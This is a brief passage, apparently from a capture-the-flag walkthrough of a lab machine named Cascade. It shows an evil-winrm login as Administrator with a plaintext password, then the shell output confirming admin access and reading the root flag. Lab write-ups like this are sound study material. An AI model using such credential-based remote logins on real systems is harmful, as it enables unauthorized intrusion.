4
5
6
7
8
9
10
11
# evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> type desktop\root.txt
6bc0ba...